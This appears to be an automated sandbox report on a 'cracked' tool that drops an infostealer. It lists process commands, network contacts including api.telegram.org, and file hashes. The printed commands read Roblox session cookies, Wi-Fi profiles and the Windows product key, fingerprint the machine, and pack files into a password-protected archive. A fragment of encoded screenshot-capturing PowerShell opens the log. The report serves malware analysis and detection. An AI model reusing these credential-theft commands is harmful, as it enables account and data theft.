CAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
C:\Windows\system32\netsh.exe
netsh wlan show profile
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\vanafkah\vanafkah.cmdline"
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESDB4C.tmp" "c:\Users\Admin\AppData\Local\Temp\vanafkah\CSCCFA8F68E133E47D0A2D1BA15605139AC.TMP"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /PID 1076"
C:\Windows\system32\taskkill.exe
taskkill /F /PID 1076
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /PID 2340"
C:\Windows\system32\taskkill.exe
taskkill /F /PID 2340
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4040"
C:\Windows\system32\taskkill.exe
taskkill /F /PID 4040
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /PID 1404"
C:\Windows\system32\taskkill.exe
taskkill /F /PID 1404
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4628"
C:\Windows\system32\taskkill.exe
taskkill /F /PID 4628
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /PID 3468"
C:\Windows\system32\taskkill.exe
taskkill /F /PID 3468
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /PID 2212"
C:\Windows\system32\taskkill.exe
taskkill /F /PID 2212
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "getmac"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Windows\system32\getmac.exe
getmac
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI11082\rar.exe a -r -hp"blank123" "C:\Users\Admin\AppData\Local\Temp\MHTN2.zip" *"
C:\Users\Admin\AppData\Local\Temp\_MEI11082\rar.exe
C:\Users\Admin\AppData\Local\Temp\_MEI11082\rar.exe a -r -hp"blank123" "C:\Users\Admin\AppData\Local\Temp\MHTN2.zip" *
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic os get Caption"
C:\Windows\System32\Wbem\WMIC.exe
wmic os get Caption
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\Wbem\WMIC.exe
wmic computersystem get totalphysicalmemory
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
C:\Windows\System32\Wbem\WMIC.exe
wmic csproduct get uuid
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | pixeldrain.com | udp |
| NL | 50.7.22.10:443 | pixeldrain.com | tcp |
| US | 8.8.8.8:53 | stats.pixeldrain.com | udp |
| DE | 78.47.86.208:443 | stats.pixeldrain.com | tcp |
| NL | 50.7.22.10:443 | pixeldrain.com | tcp |
| DE | 78.47.86.208:443 | stats.pixeldrain.com | tcp |
| US | 8.8.8.8:53 | 133.211.185.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 234.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 10.22.7.50.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 25.24.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 208.86.47.78.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 64.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| N/A | 224.0.0.251:5353 | udp | |
| NL | 52.142.223.178:80 | tcp | |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gstatic.com | udp |
| GB | 172.217.16.227:443 | gstatic.com | tcp |
| US | 8.8.8.8:53 | 227.16.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | api.telegram.org | udp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 8.8.8.8:53 | 1.112.95.208.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 220.167.154.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 82.90.14.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | 43.58.199.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 200.197.79.204.in-addr.arpa | udp |
Files
\??\pipe\crashpad_1076_FCDPUJTRQUIAVQFW
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports
| MD5 | d751713988987e9331980363e24189ce |
| SHA1 | 97d170e1550eee4afc0af065b78cda302a97674c |
| SHA256 | 4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945 |
| SHA512 | b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
| MD5 | 66488783f18ef5b8846ff79e6c949811 |
| SHA1 | 3b0eee28011c57d6539402e1835b64e5fca0272d |
| SHA256 | 436858bd3ea7fd46e60cb057d657a6c125c163930152f3d28a2b89138444d10e |
| SHA512 | d18c58f79a896b7e4c822a62725c70e2d771d2a2267d2d332197ffcc5a2f79e8ddfc7d2cf47a3d891705ec7ed758ff1e99131a3b14f477b98aa1bec8d62708ad |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | ac3f1b219fc9a8e618c19f7a3d40893c |
| SHA1 | ef27992c2528fc57aea041d7430cb9075ee61490 |
| SHA256 | b3f9811675e6e0cc74b716f267648dbdb4d6ba7f0c34680a455b768f940e1a7b |
| SHA512 | 0808679745b3710e73c32788c03189b898dedcfe2ca6323144b94b8c5ecfbf0e710a2c394ab4add1fe9b22b59231f665ac858c806597f96e149c4afbb21ae8ea |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | f804e0d73ae7508a965ba12958af26cc |
| SHA1 | 65c946e0b73007a651c862f6e5654636f78c3d6b |
| SHA256 | 8081bba579f45be589bd1b220c41c05927cb0ebb84490f14e9dfa618ac43a085 |
| SHA512 | 92ee463104a78fc80922f8c60cceda6431924690a5a445e1f4ee5a837eb4f2d6b8398f0c9aa90a17946cd401fcd48918340da62da96b00877dc77a2f2de4e584 |
C:\Users\Admin\Downloads\AIO.rar
| MD5 | 809b2160fe21cc62edf37804404dadbc |
| SHA1 | 728940307c66d5d578ea7fcf775d86e7d0589c9f |
| SHA256 | 11cf11c7fc0303dd5bf947262988b3bc10e941a7163994a084ed4308be0679fa |
| SHA512 | 89a34ddfbd65f326f929ecb8a0e5919dc0ff022ef92a4da84763b4c8ca89209f2383bffe7a0963bf4a5770b892e907de463f4cc614397f6522929d82c137a1fa |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | e8c057d24094939bbec10bd96970589f |
| SHA1 | 0443d3d43c3b9b1b0b68bc56c9a2c3963fc5afa0 |
| SHA256 | 0a1f79732e2bfd805a119385afcfdc8863cd675a37ed3d37e18e38e344dfded4 |
| SHA512 | f5bc0f95aed608f1562a8cbba12520e211eca4b9e53ea0e45e853349907bbd865c728e1e4395fd14f87ed2f93c9129661cc8ebf4bfce117c64812152e19abc00 |
C:\Users\Admin\Downloads\AIO\AIO Cracked.exe
| MD5 | 2688ebc7597f264439e307ae766ea651 |
| SHA1 | a06eb6b066da3016c4122235034bf825ca146b72 |
| SHA256 | 3aa46f7f3b723e52d392d0e87eb27c73a3482425d8a585f54a304ee7ead63805 |
| SHA512 | fedfa980ceeade0ffa931ea935401842adb0c5453f85bda70081c619fe5416ae33b075bc55ad2760d880790dea69c7286d31cae88a0ca2fbb2fba44042a766f0 |
C:\Users\Admin\AppData\Local\Temp\AIO Cracked.exe
| MD5 | 9f726d91dcd4ac2a22684c41b92fc5c0 |
| SHA1 | 3687b95e5c774266b4a8809b53776ebdbc25336c |
| SHA256 | 93b98e56ce270625e0fe7553e145c784486f7e9fcdb9b017ef9818ff0c9a8551 |
| SHA512 | b08a186e349cbdebf27791e746f2141a3e636a81cf8c7b79f8044d765533d71e3e30d63d1fc5484e2114c8e067cdfe1baee625baf8f8cf0f53c1f56eb564f0ee |
C:\Users\Admin\AppData\Local\Temp\GERDA-Êðèïò â rar.exe
| MD5 | 9e5369926f4e1884e12fe957e0cdc791 |
| SHA1 | 915bfc46423ca163ff34e587ef846d1f700430ad |
| SHA256 | 07590dedc3e3a84683dce47de2e19135f2a4b73ecf7a0d1edf37a19f57784edf |
| SHA512 | 103486ccfdb22a00f296340777f75308e3a1ea688dfec6057935d7524075708ba9a68e42a6476615f27a6b25a05463b9abcad12b3d0f6d95f54cb6336a96bfe4 |
memory/4532-117-0x0000000000400000-0x0000000000DCD000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\B68E.tmp\B68F.tmp\B690.bat
| MD5 | d45b8ba08bd1956cce082061374814b3 |
| SHA1 | e3f149aa75d8dd87ca8fa76f3bd12f1466111fbc |
| SHA256 | 794bbc158e190c8b7f050259c0a50e3badc7de1e269e068a0b16ae78a6b14bdc |
| SHA512 | 9ca4eb5f8a48ce53a73c11c3fc8bef364b3d9cf5622bd9e885aa2e9b4f52565419db7e91abcc0c3bd521ac2a5b94e386a0dc9ea5901f0ef6c03fb26e2b2276e2 |
C:\Users\Admin\Downloads\AIO\Config\update.exe
| MD5 | 5856f0e33105f09bc65aa3dcbc97a9e4 |
| SHA1 | bd04b9ef6aeb6c8b9acebc0d473ed61f9cb9478f |
| SHA256 | 9b40111f574dae2a41da906ab5c436c7956a992c2c7eae144cb96f665603692b |
| SHA512 | ae16b81419f00ba2a9aa70b3a48f73667c8ebe5685d1c16c62e81bbe97140590b91fb7942d1b8f61af1d6bb1c1197066312530fdc27ac996aaa11497f574f68e |
C:\Users\Admin\Downloads\AIO\Config\scvhost.exe
| MD5 | eed32a67d10071e4662f1242f6267117 |
| SHA1 | 5322d769e8243fccc4f98529a2ea8cc970e47b54 |
| SHA256 | 3561d401858b8a92084706a6454a9cc47fa42ecd144532c8d511b1dea28fc19a |
| SHA512 | 6ce5b0bb3bcb5b02b4f22abbc5c36afbd8e29b127b00f8f0f3db09803840b0369f2729c38adc84a7a644d59ee0d084fdce2cfa521ff0bb832c4253ab83806c54 |
memory/1848-129-0x0000000000120000-0x0000000000266000-memory.dmp
memory/4876-131-0x0000000000420000-0x000000000063E000-memory.dmp
memory/1848-133-0x0000000005200000-0x00000000057A4000-memory.dmp
memory/1848-134-0x0000000004B30000-0x0000000004BC2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\RarSFX0\1.bat
| MD5 | 30e455beaba8bfc617f401ff86c5cfb4 |
| SHA1 | fcc251646f6d66df1192b7e66d86271854d332f7 |
| SHA256 | 4c81bb640316cc004be858d8397a774d8a8ce3269db43b1412fa5e973af9acb1 |
| SHA512 | 60bb9e3d9ce68eddd41770740c639de7112b9e3dfea25a63fc72de1c9d7b8777a363fe5b2988bab7fd91637b96eb97d1c3b9b7ee1b1a3d7c81acefcdc7d73520 |
C:\Users\Admin\AppData\Local\Temp\RarSFX0\Anarchy.sfx.exe
| MD5 | cf661f0e6de2e7b7ed1dc46113709f2d |
| SHA1 | 53dbc5b4d8d4b6743dd2e5cdd3f4b822eecc5e93 |
| SHA256 | 4e7d86aa171b43ca80bde67d0e96888b4117576d66e9ab189c8249516c5f8b73 |
| SHA512 | cf1c60235d3cca1bb7cb25a33cf6bb97d13bce3f2e19ad7387ab0cb3133820e3c152691314e0bc7013fef4fd25a482d432cfe7e4290799c9f9dd085456fc6980 |
memory/1848-139-0x0000000004B20000-0x0000000004B2A000-memory.dmp
memory/4876-141-0x0000000007400000-0x000000000740A000-memory.dmp
memory/4876-140-0x0000000007490000-0x0000000007594000-memory.dmp
memory/4876-142-0x0000000007410000-0x000000000743C000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\RarSFX1\Anarchy.exe
| MD5 | 2bfedf6a805c0b09efcb38ff053e3e14 |
| SHA1 | c124c7b8be490c693a4a56bf8d28602036f3bd79 |
| SHA256 | 12d66ea2bae0257a2d3fe98014b54c2f63199e6a4a4fae2d56e034761ee18999 |
| SHA512 | b1dab7364d22f5b20c0364f83071f3ed474a06388d7d896d5eafc6f6262d225a023c72262bae0281cc0cc32a2c6386b4bc13936bda9584623ab437807f7601a9 |
C:\Users\Admin\AppData\Local\Temp\_MEI11082\python311.dll
| MD5 | 5f6fd64ec2d7d73ae49c34dd12cedb23 |
| SHA1 | c6e0385a868f3153a6e8879527749db52dce4125 |
| SHA256 | ff9f102264d1944fbfae2ba70e7a71435f51a3e8c677fd970b621c4c9ea71967 |
| SHA512 | c4be2d042c6e4d22e46eacfd550f61b8f55814bfe41d216a4df48382247df70bc63151068513855aa78f9b3d2f10ba6a824312948324c92de6dd0f6af414e8ab |
memory/4876-178-0x0000000007A20000-0x0000000007A86000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\_MEI11082\VCRUNTIME140.dll
| MD5 | 49c96cecda5c6c660a107d378fdfc3d4 |
| SHA1 | 00149b7a66723e3f0310f139489fe172f818ca8e |
| SHA256 | 69320f278d90efaaeb67e2a1b55e5b0543883125834c812c8d9c39676e0494fc |
| SHA512 | e09e072f3095379b0c921d41d6e64f4f1cd78400594a2317cfb5e5dca03dedb5a8239ed89905c9e967d1acb376b0585a35addf6648422c7ddb472ce38b1ba60d |
memory/1848-182-0x0000000006650000-0x0000000006B7C000-memory.dmp
memory/1848-184-0x0000000006250000-0x0000000006264000-memory.dmp
memory/3532-183-0x00007FFFD4A00000-0x00007FFFD4FE9000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\_MEI11082\_ssl.pyd
| MD5 | f9cc7385b4617df1ddf030f594f37323 |
| SHA1 | ebceec12e43bee669f586919a928a1fd93e23a97 |
| SHA256 | b093aa2e84a30790abeee82cf32a7c2209978d862451f1e0b0786c4d22833cb6 |
| SHA512 | 3f362c8a7542212d455f1f187e24f63c6190e564ade0f24561e7e20375a1f15eb36bd8dce9fdaafdab1d6b348a1c6f7cddb9016e4f3535b49136550bc23454fb |
memory/3532-207-0x00007FFFEBF90000-0x00007FFFEBF9F000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\_MEI11082\_sqlite3.pyd
| MD5 | 1a8fdc36f7138edcc84ee506c5ec9b92 |
| SHA1 | e5e2da357fe50a0927300e05c26a75267429db28 |
| SHA256 | 8e4b9da9c95915e864c89856e2d7671cd888028578a623e761aeac2feca04882 |
| SHA512 | 462a8f995afc4cf0e041515f0f68600dfd0b0b1402be7945d60e2157ffd4e476cf2ae9cdc8df9595f0fe876994182e3e43773785f79b20c6df08c8a8c47fffa0 |
C:\Users\Admin\AppData\Local\Temp\_MEI11082\_socket.pyd
| MD5 | 1a34253aa7c77f9534561dc66ac5cf49 |
| SHA1 | fcd5e952f8038a16da6c3092183188d997e32fb9 |
| SHA256 | dc03d32f681634e682b02e9a60fdfce420db9f26754aefb9a58654a064dc0f9f |
| SHA512 | ff9eeb4ede4b4dd75c67fab30d0dec462b8af9ca6adc1dcae58f0d169c55a98d85bb610b157f17077b8854ec15af4dfab2f0d47fa9bc463e5b2449979a50293a |
C:\Users\Admin\AppData\Local\Temp\_MEI11082\_queue.pyd
| MD5 | 347d6a8c2d48003301032546c140c145 |
| SHA1 | 1a3eb60ad4f3da882a3fd1e4248662f21bd34193 |
| SHA256 | e71803913b57c49f4ce3416ec15dc8a9e5c14f8675209624e76cd71b0319b192 |
| SHA512 | b1fdb46b80bb4a39513685781d563a7d55377e43e071901930a13c3e852d0042a5302cd238ddf6ea4d35ceee5a613c96996bffad2da3862673a0d27e60ff2c06 |
C:\Users\Admin\AppData\Local\Temp\_MEI11082\_lzma.pyd
| MD5 | 542eab18252d569c8abef7c58d303547 |
| SHA1 | 05eff580466553f4687ae43acba8db3757c08151 |
| SHA256 | d2a7111feeaacac8b3a71727482565c46141cc7a5a3d837d8349166bea5054c9 |
| SHA512 | b7897b82f1aa9d5aa895c3de810dab1aa335fdf7223e4ff29b32340ad350d9be6b145f95a71c7bc7c88c8df77c3f04853ae4d6f0d5a289721fc1468ecba3f958 |
C:\Users\Admin\AppData\Local\Temp\_MEI11082\_hashlib.pyd
| MD5 | b227bf5d9fec25e2b36d416ccd943ca3 |
| SHA1 | 4fae06f24a1b61e6594747ec934cbf06e7ec3773 |
| SHA256 | d42c3550e58b9aa34d58f709dc65dc4ee6eea83b651740822e10b0aa051df1d7 |
| SHA512 | c6d7c5a966c229c4c7042ef60015e3333dab86f83c230c97b8b1042231fdb2a581285a5a08c33ad0864c6bd82f5a3298964ab317736af8a43e7caa7669298c3e |
C:\Users\Admin\AppData\Local\Temp\_MEI11082\_decimal.pyd
| MD5 | e3fb8bf23d857b1eb860923ccc47baa5 |
| SHA1 | 46e9d5f746c047e1b2fefaaf8d3ec0f2c56c42f0 |
| SHA256 | 7da13df1f416d3ffd32843c895948e460af4dc02cf05c521909555061ed108e3 |
| SHA512 | 7b0a1fc00c14575b8f415fadc2078bebd157830887dc5b0c4414c8edfaf9fc4a65f58e5cceced11252ade4e627bf17979db397f4f0def9a908efb2eb68cd645c |
C:\Users\Admin\AppData\Local\Temp\_MEI11082\_bz2.pyd
| MD5 | c413931b63def8c71374d7826fbf3ab4 |
| SHA1 | 8b93087be080734db3399dc415cc5c875de857e2 |
| SHA256 | 17bfa656cabf7ef75741003497a1c315b10237805ff171d44625a04c16532293 |
| SHA512 | 7dc45e7e5ed35cc182de11a1b08c066918920a6879ff8e37b6bfbdd7d40bffa39ea4aca778aa8afb99c81a365c51187db046bceb938ce9ace0596f1cf746474f |
C:\Users\Admin\AppData\Local\Temp\_MEI11082\unicodedata.pyd
| MD5 | 8c42fcc013a1820f82667188e77be22d |
| SHA1 | fba7e4e0f86619aaf2868cedd72149e56a5a87d4 |
| SHA256 | 0e00b0e896457ecdc6ef85a8989888ccfbf05ebd8d8a1c493946a2f224b880c2 |
| SHA512 | 3a028443747d04d05fdd3982bb18c52d1afee2915a90275264bf5db201bd4612090914c7568f870f0af7dfee850c554b3fec9d387334d53d03da6426601942b4 |
C:\Users\Admin\AppData\Local\Temp\_MEI11082\sqlite3.dll
| MD5 | dbc64142944210671cca9d449dab62e6 |
| SHA1 | a2a2098b04b1205ba221244be43b88d90688334c |
| SHA256 | 6e6b6f7df961c119692f6c1810fbfb7d40219ea4e5b2a98c413424cf02dce16c |
| SHA512 | 3bff546482b87190bb2a499204ab691532aa6f4b4463ab5c462574fc3583f9fc023c1147d84d76663e47292c2ffc1ed1cb11bdb03190e13b6aa432a1cef85c4b |
C:\Users\Admin\AppData\Local\Temp\_MEI11082\select.pyd
| MD5 | 45d5a749e3cd3c2de26a855b582373f6 |
| SHA1 | 90bb8ac4495f239c07ec2090b935628a320b31fc |
| SHA256 | 2d15c2f311528440aa29934920fb0b015eaf8cbe3b3c9ad08a282a2d6ba68876 |
| SHA512 | c7a641d475a26712652a84b8423155ca347e0ec0155bd257c200225a64752453e4763b8885d8fb043b30e92ae023a501fff04777ba5cfe54da9a68071f25fbea |
C:\Users\Admin\AppData\Local\Temp\_MEI11082\rarreg.key
| MD5 | 4531984cad7dacf24c086830068c4abe |
| SHA1 | fa7c8c46677af01a83cf652ef30ba39b2aae14c3 |
| SHA256 | 58209c8ab4191e834ffe2ecd003fd7a830d3650f0fd1355a74eb8a47c61d4211 |
| SHA512 | 00056f471945d838ef2ce56d51c32967879fe54fcbf93a237ed85a98e27c5c8d2a39bc815b41c15caace2071edd0239d775a31d1794dc4dba49e7ecff1555122 |
C:\Users\Admin\AppData\Local\Temp\_MEI11082\rar.exe
| MD5 | 9c223575ae5b9544bc3d69ac6364f75e |
| SHA1 | 8a1cb5ee02c742e937febc57609ac312247ba386 |
| SHA256 | 90341ac8dcc9ec5f9efe89945a381eb701fe15c3196f594d9d9f0f67b4fc2213 |
| SHA512 | 57663e2c07b56024aaae07515ee3a56b2f5068ebb2f2dc42be95d1224376c2458da21c965aab6ae54de780cb874c2fc9de83d9089abf4536de0f50faca582d09 |
C:\Users\Admin\AppData\Local\Temp\_MEI11082\libssl-3.dll
| MD5 | bf4a722ae2eae985bacc9d2117d90a6f |
| SHA1 | 3e29de32176d695d49c6b227ffd19b54abb521ef |
| SHA256 | 827fdb184fdcde9223d09274be780fe4fe8518c15c8fc217748ad5fd5ea0f147 |
| SHA512 | dd83b95967582152c7b5581121e6b69a07073e7a76fe87975742bb0fd7ecef7494ec940dba914364034cc4e3f623be98cc887677b65c208f14a2a9fc7497ca73 |
C:\Users\Admin\AppData\Local\Temp\_MEI11082\libcrypto-3.dll
| MD5 | 78ebd9cb6709d939e4e0f2a6bbb80da9 |
| SHA1 | ea5d7307e781bc1fa0a2d098472e6ea639d87b73 |
| SHA256 | 6a8c458e3d96f8dd3bf6d3cacc035e38edf7f127eee5563b51f8c8790ced0b3e |
| SHA512 | b752769b3de4b78905b0326b5270091642ac89ff204e9e4d78670791a1fa211a54d777aeef59776c21f854c263add163adaef6a81b166190518cfaaf4e2e4122 |
C:\Users\Admin\AppData\Local\Temp\_MEI11082\blank.aes
| MD5 | ddef55efb37afb0c3528c0ba0e11d0e7 |
| SHA1 | f5d6277a8c7f9a9cb02d040e8fc01c7b1d0d7ec3 |
| SHA256 | eed5311740f61316d3fe2eee43ce720c6573e103a9e614faa3177f30af31a3b0 |
| SHA512 | ed3a0491afdf5eef9ef072428f630b7370243e6653a6926a68ac23319cbdea8b2c4eb928a547066a26de2d9676c40518034e15f3504a3e5416daf7217a103594 |
C:\Users\Admin\AppData\Local\Temp\_MEI11082\libffi-8.dll
| MD5 | 08b000c3d990bc018fcb91a1e175e06e |
| SHA1 | bd0ce09bb3414d11c91316113c2becfff0862d0d |
| SHA256 | 135c772b42ba6353757a4d076ce03dbf792456143b42d25a62066da46144fece |
| SHA512 | 8820d297aeda5a5ebe1306e7664f7a95421751db60d71dc20da251bcdfdc73f3fd0b22546bd62e62d7aa44dfe702e4032fe78802fb16ee6c2583d65abc891cbf |
memory/3532-189-0x00007FFFD55C0000-0x00007FFFD55E3000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\_MEI11082\_ctypes.pyd
| MD5 | 00f75daaa7f8a897f2a330e00fad78ac |
| SHA1 | 44aec43e5f8f1282989b14c4e3bd238c45d6e334 |
| SHA256 | 9ffadcb2c40ae6b67ab611acc09e050bbe544672cf05e8402a7aa3936326de1f |
| SHA512 | f222f0ebf16a5c6d16aa2fba933034e692e26e81fea4d8b008259aff4102fe8acf3807f3b016c24002daa15bb8778d7fef20f4ae1206d5a6e226f7336d4da5d4 |
C:\Users\Admin\AppData\Local\Temp\_MEI11082\base_library.zip
| MD5 | 6e746d96de218f599b7a508e7d4429e1 |
| SHA1 | b4ed74cc0b51dc3d88eb4b9bcc5a9467a45de43c |
| SHA256 | 2999b0766238d80aa8d098b74259f839a7281775bf54198a57c132675dd625f5 |
| SHA512 | e2e979a79e6109d3776d43003f7ca8d23e132278a6dbb40afdb5eb4228e64f4bbb393e6825f334909e31c75e0051e49444baf415557780e5a51330aebdc67ee7 |
memory/3532-213-0x00007FFFD5560000-0x00007FFFD558D000-memory.dmp
memory/3532-217-0x00007FFFD5530000-0x00007FFFD5553000-memory.dmp
memory/3532-216-0x00007FFFE7980000-0x00007FFFE7999000-memory.dmp
memory/3532-219-0x00007FFFD53B0000-0x00007FFFD5527000-memory.dmp
memory/3532-222-0x00007FFFD5390000-0x00007FFFD53A9000-memory.dmp
memory/3532-223-0x00007FFFE7FB0000-0x00007FFFE7FBD000-memory.dmp
memory/3532-226-0x00007FFFD5350000-0x00007FFFD5383000-memory.dmp
memory/3532-227-0x00007FFFD5280000-0x00007FFFD534D000-memory.dmp
memory/3532-230-0x00007FFFD44E0000-0x00007FFFD4A00000-memory.dmp
memory/3532-231-0x0000026171390000-0x00000261718B0000-memory.dmp
memory/3532-234-0x00007FFFD5260000-0x00007FFFD5274000-memory.dmp
memory/3532-235-0x00007FFFE7E40000-0x00007FFFE7E4D000-memory.dmp
memory/3532-237-0x00007FFFD4A00000-0x00007FFFD4FE9000-memory.dmp
memory/3532-238-0x00007FFFD5140000-0x00007FFFD525C000-memory.dmp
memory/4876-240-0x0000000008E60000-0x0000000008E68000-memory.dmp
memory/4876-243-0x00000000091A0000-0x00000000091AE000-memory.dmp
memory/4876-242-0x00000000091E0000-0x0000000009218000-memory.dmp
memory/4876-241-0x0000000009190000-0x0000000009198000-memory.dmp
memory/4876-244-0x0000000009260000-0x00000000092A0000-memory.dmp
memory/2000-250-0x000001CF02A70000-0x000001CF02A92000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_rb3zzqud.o4b.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/1428-312-0x000001D825660000-0x000001D825661000-memory.dmp
